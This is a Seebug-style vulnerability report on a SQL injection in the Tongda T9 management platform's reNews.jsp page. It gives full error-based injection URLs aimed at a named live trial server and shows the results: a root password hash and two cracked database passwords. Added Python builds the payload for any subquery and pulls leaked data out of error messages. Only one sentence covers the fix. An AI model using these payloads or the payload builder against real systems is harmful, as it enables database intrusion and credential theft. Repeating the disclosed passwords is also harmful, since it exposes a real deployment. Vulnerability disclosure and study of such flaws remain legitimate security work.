Tongda T9 Intelligent Management Platform Standard Edition SQL Injection Vulnerability

2014-03-18T00:00:00
ID SSV:96098
Type seebug
Reporter Root
Modified 2014-03-18T00:00:00

Description

Brief description:

Tongda T9 Intelligent Management Platform Standard Edition contains a SQL injection vulnerability.

Detailed description:

The online trial instance of Tongda T9 Intelligent Management Platform Standard Edition is at http://t9.go2oa.com:86/t9/login.jsp. After logging in, the page core/funcs/news/show/reNews.jsp has a MySQL error-based SQL injection in the seqId parameter, through which system data can be extracted.

1. Retrieve the MySQL version: http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600">

2. Dump the root user's password: http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png" alt="20140317220353.png" width="600">

This successfully dumped root's password hash 91AF99F23C3D4ED85140D100433725DFA52BECEE, which cracks to myoa888.

<img src="https://images.seebug.org/upload/201403/1722092523c80934ac9823dcca54602c606d5470.png" alt="20140317220907.png" width="600">

3. Dump the password of a MySQL user that is allowed to connect remotely: http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1

<img src="https://images.seebug.org/upload/201403/1722130768d9df2b63b00ea06db0ac66b6f5bc69.png" alt="20140317221251.png" width="600">

This one cracks to cms6_8. No further data was dumped; the injection point runs with fairly high database privileges and can read every table in the database.
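The three requests above all rely on the same trick: `floor(rand(0)*2)` is deterministic, and grouping on it makes MySQL attempt to insert a duplicate key into its temporary table, so the leaked value smuggled into the key via `concat()` lands in the "Duplicate entry" error message. The following Python is an added example, not code from the original report or from Tongda: it re-implements MySQL's `RAND(N)` generator to show the 0,1,1,0,1,1 sequence, simulates the group-by lookup/insert behaviour to show why a source table needs at least three rows, builds the page's payload for an arbitrary subquery, and parses the leaked value out of a constructed error response. The table name `flow_sort`, the sample response text and the `5.5.20` version string are assumptions for illustration.

```python
import re
from itertools import islice

# --- 1. MySQL's RAND(seed): a small linear congruential generator -----------
# Re-implemented from the algorithm in mysys/my_rnd.c so the key sequence can
# be reproduced offline. This is our re-implementation, not MySQL's own code.
MAX_VALUE = 0x3FFFFFFF


def mysql_rand(seed: int):
    """Yield the doubles MySQL's RAND(seed) returns, in order."""
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_keys(n: int, seed: int = 0):
    """First n values of floor(rand(seed)*2); for seed 0: 0,1,1,0,1,1,..."""
    return [int(v * 2) for v in islice(mysql_rand(seed), n)]


# --- 2. Why GROUP BY on that key raises an error ---------------------------
# While filling the temporary table MySQL evaluates the key once to look it
# up and, when it is absent, evaluates it again for the insert. With the
# sequence 0,1,1,... row 1 looks up 0 but inserts 1; row 2 finds 1; row 3
# looks up 0, re-evaluates to 1 and tries to insert a key that exists.
def simulate_group_by(row_count: int, leaked: str, seed: int = 0):
    """Return the duplicated key string, or None when no error would occur.

    `leaked` stands for the data appended to the key via concat(...,0x3a,...).
    """
    rng = (int(v * 2) for v in mysql_rand(seed))
    temp_table = {}
    for _ in range(row_count):
        key = f"{next(rng)}:{leaked}"
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = f"{next(rng)}:{leaked}"  # re-evaluated on insert
        if key in temp_table:
            return key                  # the "Duplicate entry" error
        temp_table[key] = 1
    return None


# --- 3. Payload construction and result extraction -------------------------
def build_payload(subquery: str, table: str = "flow_sort") -> str:
    """Parameter value (before URL-encoding) for a quoted string context, in
    the same shape as the page's reNews.jsp payload. `table` may be any
    table with at least three rows; flow_sort is the one the page uses."""
    return (
        f"' union select '1' from (select count(*),"
        f"concat(floor(rand(0)*2),0x3a,({subquery}))a "
        f"from {table} group by a)b where 1=1 or '1'='1"
    )


# MySQL 5.x prints "for key 'group_key'", MySQL 8 "for key '<group_key>'".
DUP_ENTRY = re.compile(r"Duplicate entry '1:(.*?)' for key '<?group_key>?'")


def extract_leak(response_body: str):
    """Pull the leaked value out of a duplicate-entry error in a response.

    MySQL truncates the reported key, so long values must be fetched in
    slices (substring()) or one row at a time (limit N,1, as the page does).
    """
    m = DUP_ENTRY.search(response_body)
    return m.group(1) if m else None


# Constructed sample response, not captured from a real server.
SAMPLE_RESPONSE = (
    "<html><body>java.sql.SQLException: "
    "Duplicate entry '1:5.5.20' for key 'group_key'</body></html>"
)

if __name__ == "__main__":
    print(floor_rand_keys(6))
    print(simulate_group_by(3, "5.5.20"))
    print(build_payload("select @@version"))
    print(extract_leak(SAMPLE_RESPONSE))
```

Because the leaked value is carried in an error message, the technique only works when the application reflects the JDBC exception text into the page, which is what the screenshots above show reNews.jsp doing; in a hardened deployment the fix is a parameterized query for seqId (a PreparedStatement placeholder, not string concatenation) together with suppressing database error text in responses.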

Proof of vulnerability:

The screenshots in the detailed description above (the MySQL version and root credential dumps) serve as proof.